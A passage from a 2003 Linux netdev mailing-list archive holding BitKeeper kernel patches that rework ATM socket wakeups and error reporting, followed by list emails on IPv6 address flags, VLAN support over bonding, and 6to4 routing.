prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq2(vcc,as_modify,NULL,NULL,&vcc->local,qos,0); while (vcc->reply == WAITING && !test_bit(ATM_VF_RELEASED,&vcc->flags) && sigd) { schedule(); - prepare_to_wait(&vcc->sleep, &wait, TASK_UNINTERRUPTIBLE); + prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } - finish_wait(&vcc->sleep, &wait); + finish_wait(vcc->sk->sk_sleep, &wait); if (!sigd) return -EUNATCH; return vcc->reply; } [atm]: use sk_data_ready and sk_change_state instead of wake_up # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1365 -> 1.1366 # net/atm/lec.c 1.31 -> 1.32 # net/atm/signaling.c 1.18 -> 1.19 # net/atm/mpc.c 1.22 -> 1.23 # net/atm/raw.c 1.5 -> 1.6 # net/atm/clip.c 1.19 -> 1.20 # net/atm/common.c 1.40 -> 1.41 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/23 chas@relax.cmf.nrl.navy.mil 1.1366 # use sk_data_ready and sk_change_state instead of wake_up # -------------------------------------------- # diff -Nru a/net/atm/clip.c b/net/atm/clip.c --- a/net/atm/clip.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/clip.c Mon Jun 23 10:57:48 2003 @@ -67,7 +67,7 @@ ctrl->ip = ip; atm_force_charge(atmarpd,skb->truesize); skb_queue_tail(&atmarpd->sk->sk_receive_queue, skb); - wake_up(atmarpd->sk->sk_sleep); + atmarpd->sk->sk_data_ready(atmarpd->sk, skb->len); return 0; } diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/common.c Mon Jun 23 10:57:48 2003 @@ -328,7 +328,7 @@ set_bit(ATM_VF_CLOSE, &vcc->flags); vcc->reply = reply; vcc->sk->sk_err = -reply; - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_state_change(vcc->sk); } diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/lec.c Mon Jun 23 10:57:48 2003 @@ -134,7 +134,7 @@ priv = (struct lec_priv *)dev->priv; atm_force_charge(priv->lecd, skb2->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb2); - wake_up(priv->lecd->sk->sk_sleep); + priv->lecd->sk->sk_data_ready(priv->lecd->sk, skb2->len); } return; @@ -513,7 +513,7 @@ memcpy(skb2->data, mesg, sizeof(struct atmlec_msg)); atm_force_charge(priv->lecd, skb2->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb2); - wake_up(priv->lecd->sk->sk_sleep); + priv->lecd->sk->sk_data_ready(priv->lecd->sk, skb2->len); } if (f != NULL) br_fdb_put_hook(f); #endif /* defined(CONFIG_BRIDGE) || defined(CONFIG_BRIDGE_MODULE) */ @@ -598,13 +598,13 @@ 
atm_force_charge(priv->lecd, skb->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, skb); - wake_up(priv->lecd->sk->sk_sleep); + priv->lecd->sk->sk_data_ready(priv->lecd->sk, skb->len); if (data != NULL) { DPRINTK("lec: about to send %d bytes of data\n", data->len); atm_force_charge(priv->lecd, data->truesize); skb_queue_tail(&priv->lecd->sk->sk_receive_queue, data); - wake_up(priv->lecd->sk->sk_sleep); + priv->lecd->sk->sk_data_ready(priv->lecd->sk, skb->len); } return 0; @@ -686,7 +686,7 @@ if (memcmp(skb->data, lec_ctrl_magic, 4) ==0) { /* Control frame, to daemon*/ DPRINTK("%s: To daemon\n",dev->name); skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_data_ready(vcc->sk, skb->len); } else { /* Data frame, queue to protocol handlers */ unsigned char *dst; diff -Nru a/net/atm/mpc.c b/net/atm/mpc.c --- a/net/atm/mpc.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/mpc.c Mon Jun 23 10:57:48 2003 @@ -669,7 +669,7 @@ dprintk("mpoa: (%s) mpc_push: control packet arrived\n", dev->name); /* Pass control packets to daemon */ skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_data_ready(vcc->sk, skb->len); return; } @@ -947,7 +947,7 @@ memcpy(skb->data, mesg, sizeof(struct k_message)); atm_force_charge(mpc->mpoad_vcc, skb->truesize); skb_queue_tail(&mpc->mpoad_vcc->sk->sk_receive_queue, skb); - wake_up(mpc->mpoad_vcc->sk->sk_sleep); + mpc->mpoad_vcc->sk->sk_data_ready(mpc->mpoad_vcc->sk, skb->len); return 0; } @@ -1226,7 +1226,7 @@ atm_force_charge(vcc, skb->truesize); skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_data_ready(vcc->sk, skb->len); dprintk("mpoa: purge_egress_shortcut: exiting:\n"); return; diff -Nru a/net/atm/raw.c b/net/atm/raw.c --- a/net/atm/raw.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/raw.c Mon Jun 23 10:57:48 2003 @@ -29,7 +29,7 @@ { if (skb) { skb_queue_tail(&vcc->sk->sk_receive_queue, skb); - 
wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_data_ready(vcc->sk, skb->len); } } diff -Nru a/net/atm/signaling.c b/net/atm/signaling.c --- a/net/atm/signaling.c Mon Jun 23 10:57:48 2003 +++ b/net/atm/signaling.c Mon Jun 23 10:57:48 2003 @@ -63,7 +63,7 @@ #endif atm_force_charge(sigd,skb->truesize); skb_queue_tail(&sigd->sk->sk_receive_queue,skb); - wake_up(sigd->sk->sk_sleep); + sigd->sk->sk_data_ready(sigd->sk, skb->len); } @@ -206,7 +206,7 @@ set_bit(ATM_VF_RELEASED,&vcc->flags); vcc->reply = -EUNATCH; vcc->sk->sk_err = EUNATCH; - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_state_change(vcc->sk); } } [atm]: replace vcc->reply with sk->sk_err; implement sk_write_space # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1310.51.8 -> 1.1310.51.9 # net/atm/signaling.h 1.1 -> 1.2 # net/atm/proc.c 1.21 -> 1.22 # net/atm/pvc.c 1.17 -> 1.18 # drivers/atm/atmtcp.c 1.12 -> 1.13 # net/atm/svc.c 1.21 -> 1.22 # net/atm/common.h 1.15 -> 1.16 # net/atm/signaling.c 1.19 -> 1.20 # include/linux/atmdev.h 1.21 -> 1.22 # net/atm/raw.c 1.6 -> 1.7 # net/atm/common.c 1.41 -> 1.42 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/05 chas@relax.cmf.nrl.navy.mil 1.1310.51.9 # replace vcc->reply with sk->sk_err; making WAITING a ATM_VF flag # -------------------------------------------- # diff -Nru a/drivers/atm/atmtcp.c b/drivers/atm/atmtcp.c --- a/drivers/atm/atmtcp.c Mon Jul 14 22:19:44 2003 +++ b/drivers/atm/atmtcp.c Mon Jul 14 22:19:44 2003 @@ -90,7 +90,7 @@ vcc->vpi = msg->addr.sap_addr.vpi; vcc->vci = msg->addr.sap_addr.vci; vcc->qos = msg->qos; - vcc->reply = msg->result; + vcc->sk->sk_err = -msg->result; switch (msg->type) { case ATMTCP_CTRL_OPEN: change_bit(ATM_VF_READY,&vcc->flags); @@ -134,7 +134,7 @@ clear_bit(ATM_VF_READY,&vcc->flags); /* just in 
case ... */ error = atmtcp_send_control(vcc,ATMTCP_CTRL_OPEN,&msg,ATM_VF_READY); if (error) return error; - return vcc->reply; + return -vcc->sk->sk_err; } diff -Nru a/include/linux/atmdev.h b/include/linux/atmdev.h --- a/include/linux/atmdev.h Mon Jul 14 22:19:44 2003 +++ b/include/linux/atmdev.h Mon Jul 14 22:19:44 2003 @@ -252,6 +252,7 @@ ATM_VF_SESSION, /* VCC is p2mp session control descriptor */ ATM_VF_HASSAP, /* SAP has been set */ ATM_VF_CLOSE, /* asynchronous close - treat like VF_RELEASED*/ + ATM_VF_WAITING, /* waiting for reply from sigd */ }; @@ -296,7 +297,6 @@ short itf; /* interface number */ struct sockaddr_atmsvc local; struct sockaddr_atmsvc remote; - int reply; /* also used by ATMTCP */ /* Multipoint part ------------------------------------------------- */ struct atm_vcc *session; /* session VCC descriptor */ /* Other stuff ----------------------------------------------------- */ diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/common.c Mon Jul 14 22:19:44 2003 @@ -243,6 +243,29 @@ wake_up(sk->sk_sleep); read_unlock(&sk->sk_callback_lock); } + +static inline int vcc_writable(struct sock *sk) +{ + struct atm_vcc *vcc = atm_sk(sk); + + return (vcc->qos.txtp.max_sdu + + atomic_read(&sk->sk_wmem_alloc)) <= sk->sk_sndbuf; +} + +static void vcc_write_space(struct sock *sk) +{ + read_lock(&sk->sk_callback_lock); + + if (vcc_writable(sk)) { + if (sk->sk_sleep && waitqueue_active(sk->sk_sleep)) + wake_up_interruptible(sk->sk_sleep); + + sk_wake_async(sk, 2, POLL_OUT); + } + + read_unlock(&sk->sk_callback_lock); +} + int vcc_create(struct socket *sock, int protocol, int family) { @@ -257,6 +280,7 @@ return -ENOMEM; sock_init_data(sock, sk); sk->sk_state_change = vcc_def_wakeup; + sk->sk_write_space = vcc_write_space; vcc = atm_sk(sk) = kmalloc(sizeof(*vcc), GFP_KERNEL); if (!vcc) { @@ -326,8 +350,8 @@ void vcc_release_async(struct atm_vcc *vcc, int reply) { set_bit(ATM_VF_CLOSE, &vcc->flags); - 
vcc->reply = reply; vcc->sk->sk_err = -reply; + clear_bit(ATM_VF_WAITING, &vcc->flags); vcc->sk->sk_state_change(vcc->sk); } @@ -501,7 +525,7 @@ vcc = ATM_SD(sock); if (test_bit(ATM_VF_RELEASED,&vcc->flags) || test_bit(ATM_VF_CLOSE,&vcc->flags)) - return vcc->reply; + return -sk->sk_err; if (!test_bit(ATM_VF_READY, &vcc->flags)) return 0; @@ -558,7 +582,7 @@ vcc = ATM_SD(sock); if (test_bit(ATM_VF_RELEASED, &vcc->flags) || test_bit(ATM_VF_CLOSE, &vcc->flags)) { - error = vcc->reply; + error = -sk->sk_err; goto out; } if (!test_bit(ATM_VF_READY, &vcc->flags)) { @@ -589,7 +613,7 @@ } if (test_bit(ATM_VF_RELEASED,&vcc->flags) || test_bit(ATM_VF_CLOSE,&vcc->flags)) { - error = vcc->reply; + error = -sk->sk_err; break; } if (!test_bit(ATM_VF_READY,&vcc->flags)) { @@ -617,29 +641,38 @@ } -unsigned int atm_poll(struct file *file,struct socket *sock,poll_table *wait) +unsigned int vcc_poll(struct file *file, struct socket *sock, poll_table *wait) { + struct sock *sk = sock->sk; struct atm_vcc *vcc; unsigned int mask; - vcc = ATM_SD(sock); - poll_wait(file, vcc->sk->sk_sleep, wait); + poll_wait(file, sk->sk_sleep, wait); mask = 0; - if (skb_peek(&vcc->sk->sk_receive_queue)) - mask |= POLLIN | POLLRDNORM; - if (test_bit(ATM_VF_RELEASED,&vcc->flags) || - test_bit(ATM_VF_CLOSE,&vcc->flags)) + + vcc = ATM_SD(sock); + + /* exceptional events */ + if (sk->sk_err) + mask = POLLERR; + + if (test_bit(ATM_VF_RELEASED, &vcc->flags) || + test_bit(ATM_VF_CLOSE, &vcc->flags)) mask |= POLLHUP; - if (sock->state != SS_CONNECTING) { - if (vcc->qos.txtp.traffic_class != ATM_NONE && - vcc->qos.txtp.max_sdu + - atomic_read(&vcc->sk->sk_wmem_alloc) <= vcc->sk->sk_sndbuf) - mask |= POLLOUT | POLLWRNORM; - } - else if (vcc->reply != WAITING) { - mask |= POLLOUT | POLLWRNORM; - if (vcc->reply) mask |= POLLERR; - } + + /* readable? */ + if (!skb_queue_empty(&sk->sk_receive_queue)) + mask |= POLLIN | POLLRDNORM; + + /* writable? 
*/ + if (sock->state == SS_CONNECTING && + test_bit(ATM_VF_WAITING, &vcc->flags)) + return mask; + + if (vcc->qos.txtp.traffic_class != ATM_NONE && + vcc_writable(vcc->sk)) + mask |= POLLOUT | POLLWRNORM | POLLWRBAND; + return mask; } diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jul 14 22:19:44 2003 +++ b/net/atm/common.h Mon Jul 14 22:19:44 2003 @@ -17,7 +17,7 @@ int size, int flags); int vcc_sendmsg(struct kiocb *iocb, struct socket *sock, struct msghdr *m, int total_len); -unsigned int atm_poll(struct file *file,struct socket *sock,poll_table *wait); +unsigned int vcc_poll(struct file *file, struct socket *sock, poll_table *wait); int vcc_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg); int vcc_setsockopt(struct socket *sock, int level, int optname, char *optval, int optlen); diff -Nru a/net/atm/proc.c b/net/atm/proc.c --- a/net/atm/proc.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/proc.c Mon Jul 14 22:19:44 2003 @@ -224,7 +224,7 @@ here += sprintf(here, "%3d", vcc->sk->sk_family); } here += sprintf(here," %04lx %5d %7d/%7d %7d/%7d\n",vcc->flags, - vcc->reply, + vcc->sk->sk_err, atomic_read(&vcc->sk->sk_wmem_alloc), vcc->sk->sk_sndbuf, atomic_read(&vcc->sk->sk_rmem_alloc), vcc->sk->sk_rcvbuf); } diff -Nru a/net/atm/pvc.c b/net/atm/pvc.c --- a/net/atm/pvc.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/pvc.c Mon Jul 14 22:19:44 2003 @@ -111,7 +111,7 @@ .socketpair = sock_no_socketpair, .accept = sock_no_accept, .getname = pvc_getname, - .poll = atm_poll, + .poll = vcc_poll, .ioctl = vcc_ioctl, .listen = sock_no_listen, .shutdown = pvc_shutdown, diff -Nru a/net/atm/raw.c b/net/atm/raw.c --- a/net/atm/raw.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/raw.c Mon Jul 14 22:19:44 2003 @@ -40,7 +40,7 @@ skb->truesize); atomic_sub(skb->truesize, &vcc->sk->sk_wmem_alloc); dev_kfree_skb_any(skb); - wake_up(vcc->sk->sk_sleep); + vcc->sk->sk_write_space(vcc->sk); } diff -Nru a/net/atm/signaling.c b/net/atm/signaling.c --- a/net/atm/signaling.c 
Mon Jul 14 22:19:44 2003 +++ b/net/atm/signaling.c Mon Jul 14 22:19:44 2003 @@ -105,7 +105,8 @@ vcc = *(struct atm_vcc **) &msg->vcc; switch (msg->type) { case as_okay: - vcc->reply = msg->reply; + vcc->sk->sk_err = -msg->reply; + clear_bit(ATM_VF_WAITING, &vcc->flags); if (!*vcc->local.sas_addr.prv && !*vcc->local.sas_addr.pub) { vcc->local.sas_family = AF_ATMSVC; @@ -125,8 +126,8 @@ case as_error: clear_bit(ATM_VF_REGIS,&vcc->flags); clear_bit(ATM_VF_READY,&vcc->flags); - vcc->reply = msg->reply; vcc->sk->sk_err = -msg->reply; + clear_bit(ATM_VF_WAITING, &vcc->flags); break; case as_indicate: vcc = *(struct atm_vcc **) &msg->listen_vcc; @@ -147,8 +148,8 @@ case as_close: set_bit(ATM_VF_RELEASED,&vcc->flags); clear_bit(ATM_VF_READY,&vcc->flags); - vcc->reply = msg->reply; vcc->sk->sk_err = -msg->reply; + clear_bit(ATM_VF_WAITING, &vcc->flags); break; case as_modify: modify_qos(vcc,msg); @@ -204,8 +205,8 @@ if (vcc->sk->sk_family == PF_ATMSVC && !test_bit(ATM_VF_META,&vcc->flags)) { set_bit(ATM_VF_RELEASED,&vcc->flags); - vcc->reply = -EUNATCH; vcc->sk->sk_err = EUNATCH; + clear_bit(ATM_VF_WAITING, &vcc->flags); vcc->sk->sk_state_change(vcc->sk); } } diff -Nru a/net/atm/signaling.h b/net/atm/signaling.h --- a/net/atm/signaling.h Mon Jul 14 22:19:44 2003 +++ b/net/atm/signaling.h Mon Jul 14 22:19:44 2003 @@ -11,9 +11,6 @@ #include -#define WAITING 1 /* for reply: 0: no error, < 0: error, ... 
*/ - - extern struct atm_vcc *sigd; /* needed in svc_release */ diff -Nru a/net/atm/svc.c b/net/atm/svc.c --- a/net/atm/svc.c Mon Jul 14 22:19:44 2003 +++ b/net/atm/svc.c Mon Jul 14 22:19:44 2003 @@ -137,10 +137,10 @@ goto out; } vcc->local = *addr; - vcc->reply = WAITING; + set_bit(ATM_VF_WAITING, &vcc->flags); prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(vcc,as_bind,NULL,NULL,&vcc->local); - while (vcc->reply == WAITING && sigd) { + while (test_bit(ATM_VF_WAITING, &vcc->flags) && sigd) { schedule(); prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } @@ -150,9 +150,9 @@ error = -EUNATCH; goto out; } - if (!vcc->reply) + if (!sk->sk_err) set_bit(ATM_VF_BOUND,&vcc->flags); - error = vcc->reply; + error = -sk->sk_err; out: release_sock(sk); return error; @@ -183,13 +183,13 @@ error = -EISCONN; goto out; case SS_CONNECTING: - if (vcc->reply == WAITING) { + if (test_bit(ATM_VF_WAITING, &vcc->flags)) { error = -EALREADY; goto out; } sock->state = SS_UNCONNECTED; - if (vcc->reply) { - error = vcc->reply; + if (sk->sk_err) { + error = -sk->sk_err; goto out; } break; @@ -218,7 +218,7 @@ goto out; } vcc->remote = *addr; - vcc->reply = WAITING; + set_bit(ATM_VF_WAITING, &vcc->flags); prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); sigd_enq(vcc,as_connect,NULL,NULL,&vcc->remote); if (flags & O_NONBLOCK) { @@ -228,7 +228,7 @@ goto out; } error = 0; - while (vcc->reply == WAITING && sigd) { + while (test_bit(ATM_VF_WAITING, &vcc->flags) && sigd) { schedule(); if (!signal_pending(current)) { prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); @@ -248,11 +248,11 @@ * Kernel <--close--- Demon */ sigd_enq(vcc,as_close,NULL,NULL,NULL); - while (vcc->reply == WAITING && sigd) { + while (test_bit(ATM_VF_WAITING, &vcc->flags) && sigd) { prepare_to_wait(sk->sk_sleep, &wait, TASK_INTERRUPTIBLE); schedule(); } - if (!vcc->reply) + if (!sk->sk_err) while (!test_bit(ATM_VF_RELEASED,&vcc->flags) && sigd) { prepare_to_wait(sk->sk_sleep, 
&wait, TASK_INTERRUPTIBLE); @@ -272,8 +272,8 @@ error = -EUNATCH; goto out; } - if (vcc->reply) { - error = vcc->reply; + if (sk->sk_err) { + error = -sk->sk_err; goto out; } } @@ -311,10 +311,10 @@ error = -EINVAL; goto out; } - vcc->reply = WAITING; + set_bit(ATM_VF_WAITING, &vcc->flags); prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(vcc,as_listen,NULL,NULL,&vcc->local); - while (vcc->reply == WAITING && sigd) { + while (test_bit(ATM_VF_WAITING, &vcc->flags) && sigd) { schedule(); prepare_to_wait(sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } @@ -326,7 +326,7 @@ set_bit(ATM_VF_LISTEN,&vcc->flags); vcc->sk->sk_max_ack_backlog = backlog > 0 ? backlog : ATM_BACKLOG_DEFAULT; - error = vcc->reply; + error = -sk->sk_err; out: release_sock(sk); return error; @@ -359,7 +359,7 @@ sigd) { if (test_bit(ATM_VF_RELEASED,&old_vcc->flags)) break; if (test_bit(ATM_VF_CLOSE,&old_vcc->flags)) { - error = old_vcc->reply; + error = -sk->sk_err; break; } if (flags & O_NONBLOCK) { @@ -399,10 +399,10 @@ goto out; } /* wait should be short, so we ignore the non-blocking flag */ - new_vcc->reply = WAITING; + set_bit(ATM_VF_WAITING, &new_vcc->flags); prepare_to_wait(new_vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq(new_vcc,as_accept,old_vcc,NULL,NULL); - while (new_vcc->reply == WAITING && sigd) { + while (test_bit(ATM_VF_WAITING, &new_vcc->flags) && sigd) { release_sock(sk); schedule(); lock_sock(sk); @@ -413,9 +413,10 @@ error = -EUNATCH; goto out; } - if (!new_vcc->reply) break; - if (new_vcc->reply != -ERESTARTSYS) { - error = new_vcc->reply; + if (!new_vcc->sk->sk_err) + break; + if (new_vcc->sk->sk_err != ERESTARTSYS) { + error = -new_vcc->sk->sk_err; goto out; } } @@ -443,17 +444,17 @@ { DEFINE_WAIT(wait); - vcc->reply = WAITING; + set_bit(ATM_VF_WAITING, &vcc->flags); prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); sigd_enq2(vcc,as_modify,NULL,NULL,&vcc->local,qos,0); - while (vcc->reply == WAITING && 
!test_bit(ATM_VF_RELEASED,&vcc->flags) - && sigd) { + while (test_bit(ATM_VF_WAITING, &vcc->flags) && + !test_bit(ATM_VF_RELEASED, &vcc->flags) && sigd) { schedule(); prepare_to_wait(vcc->sk->sk_sleep, &wait, TASK_UNINTERRUPTIBLE); } finish_wait(vcc->sk->sk_sleep, &wait); if (!sigd) return -EUNATCH; - return vcc->reply; + return -vcc->sk->sk_err; } @@ -519,7 +520,7 @@ .socketpair = sock_no_socketpair, .accept = svc_accept, .getname = svc_getname, - .poll = atm_poll, + .poll = vcc_poll, .ioctl = vcc_ioctl, .listen = svc_listen, .shutdown = svc_shutdown, From kuznet@ms2.inr.ac.ru Tue Jul 15 06:20:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 06:21:01 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FDKmFl013094 for ; Tue, 15 Jul 2003 06:20:51 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id RAA08283; Tue, 15 Jul 2003 17:20:30 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307151320.RAA08283@dub.inr.ac.ru> Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 To: yoshfuji@linux-ipv6.org (YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=) Date: Tue, 15 Jul 2003 17:20:30 +0400 (MSD) Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org In-Reply-To: <20030715.155930.65250697.yoshfuji@linux-ipv6.org> from "YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=" at éÀÌ 15, 2003 03:59:30 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4048 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > > > + IFA_IFFLAGS, > > > > What's about ifa_flags? There is some space there, and the things > > kept there now: TENTATIVE/DEPRECATED et al. are close relatives > > of O/M. 
> > Alexey, O/M are not flags for addresses, but for interfaces. > I believe we should not mix them up. OK. But tell me, please, what is the difference between new _address_ attribute IFA_IFFLAGS and already existing address attrbute ifa_flags? If you are going to enclose these per-interface flags to address information, they can be enclosed within existing attrubute. Alexey From shmulik.hen@intel.com Tue Jul 15 06:55:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 06:55:56 -0700 (PDT) Received: from caduceus.sc.intel.com (fmr04.intel.com [143.183.121.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FDtZFl016482 for ; Tue, 15 Jul 2003 06:55:37 -0700 Received: from petasus.sc.intel.com (petasus.sc.intel.com [10.3.253.4]) by caduceus.sc.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6FDs8405855 for ; Tue, 15 Jul 2003 13:54:10 GMT Received: from fmsmsxvs042.fm.intel.com (fmsmsxvs042.fm.intel.com [132.233.42.128]) by petasus.sc.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6FDs1r26913 for ; Tue, 15 Jul 2003 13:54:01 GMT Received: from jrslxjul1.npdj.intel.com ([10.12.254.186]) by fmsmsxvs042.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071506595925293 ; Tue, 15 Jul 2003 07:00:02 -0700 Date: Tue, 15 Jul 2003 16:55:18 +0300 (IDT) From: Shmulik Hen X-X-Sender: Reply-To: Shmulik Hen To: bond-devel , linux-net , linux-netdev , "David S. 
Miller" , Ben Greear , Jeff Garzik , Jay Vosburgh cc: Amir Noam , Noam Marom , Shmulik Hen , Tsippy Mendelson Subject: [RFC][bonding] Improve VLAN support on top of bonding Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4049 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shmulik.hen@intel.com Precedence: bulk X-list: netdev Hi All, Currently, when using 8021q VLAN module to work on top of bonding, everything seems to work OK, but there are some issues that will not work according to our analysis. For example, any self-generated packets sent by bonding itself (e.g. arp-mon, TLB learning packets, ALB arp replies, etc.) do not have the VLAN id tag in them, and thus will not go through the switch. Also, in order to configure a VLAN interface, the underlying interface must be configured first to IP address 0.0.0.0. Since arp-mon uses bond's IP address, this might cause further problems. Other issue we've still not investigated, like what happens if bonding needs to parse a tagged packet for layer2/layer3 data, might still create more problems. We have come up with some possible solution we would like to get comments on. First of all, our main guide line was not to duplicate code segments that are in the VLAN module and put them in bonding. Further, we figured bonding should not need to know about how the VLAN module handles hardware acceleration. On the other hand, bonding does need to know what VLAN tags are being used so it may send packets successfully through all the switch ports, so some kind of policy needs to be defined. So here is what we've come up with until now. 1. Configuration Need to decide between: a. Block VLAN add/del operations when bond has no slaves. b. Block enslave/release of slaves when bond has no VLAN tags (needs a module parameter). c. Remove limitation of IP 0.0.0.0. 2. Indication Need to decide between: a. 
Add notification mechanism in VLAN module that bonding may register to listen to, and thus keep track of VLAN tags added/removed. b. Register to listen to net device register/unregister notifications to monitor creation/destruction of VLAN devices. Requires support for figuring out if a net device is a VLAN device, and also two vlan calls like get_realdev() and get_vlan_id() exported. c. Parse every packet going through bonding to collect VLAN tags. 3. Monitoring In order for bonding to be able to generate tagged packets on its own, two major changes need to be done. One is split the vlan_start_xmit function into insert_tag() and vlan_xmit(), so bonding may choose the required tag on its own, and let 8021q to the transmit. A second change is to split arp_send() into arp_create() and arp_send(), so bonding may pass all the usual parameters for arp creation, get a complete arp packet and then pass it to 8021q for tag insertion on transmission. Hardware acceleration ===================== When coming to analyze what is required for adding support for VLAN hardware acceleration on top of bonding, other issues come to mind. Since add/del operations are defined and handshakes are performed between the VLAN module and the device driver, tracking VLAN tags is simpler and commands should just be propagated to the slaves. Enslaving/releasing slaves should also be simple and just require adding/removing existing VLAN tags from them. The problem is how to handle configuration issues. 1. Since adding the first VLAN tag requires some additional handshake, can bonding support that operation on a bond that already has slaves and is running? 2. What about removing the last tag from a bond? 3. Should the bond device declare itself as "VLAN challenged" before registering and remove that limitation only once it has slaves? 4. 
Should the bond declare itself as fully hardware acceleration capable to benefit from "strong" slaves while performing regular VLAN inserting/stripping for "weak" slaves? 5. How can bonding generate untagged packets and send them via hardware acceleration capable slaves (e.g. 802.3ad LACPDU) ? -- | Shmulik Hen | | Israel Design Center (Jerusalem) | | LAN Access Division | | Intel Communications Group, Intel corp. | From kuznet@ms2.inr.ac.ru Tue Jul 15 07:29:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 07:29:14 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FET6Fl017830 for ; Tue, 15 Jul 2003 07:29:07 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id SAA08491; Tue, 15 Jul 2003 18:28:49 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307151428.SAA08491@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: pekkas@netcore.fi (Pekka Savola) Date: Tue, 15 Jul 2003 18:28:49 +0400 (MSD) Cc: davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at éÀÌ 15, 2003 09:28:11 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4050 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > 1) modify /sbin/ip and /sbin/route (and the rest if any) so that they'll > parse global next-hop information and resolve it for the kernel, and > report the resolved information to the kernel (see the other thread) No, really. It is problem of user to supply reasonable values. This policy is not forced, because there are many cases when it does not make sense (f.e. on all the routers, on all the PtP interfaces et al). 
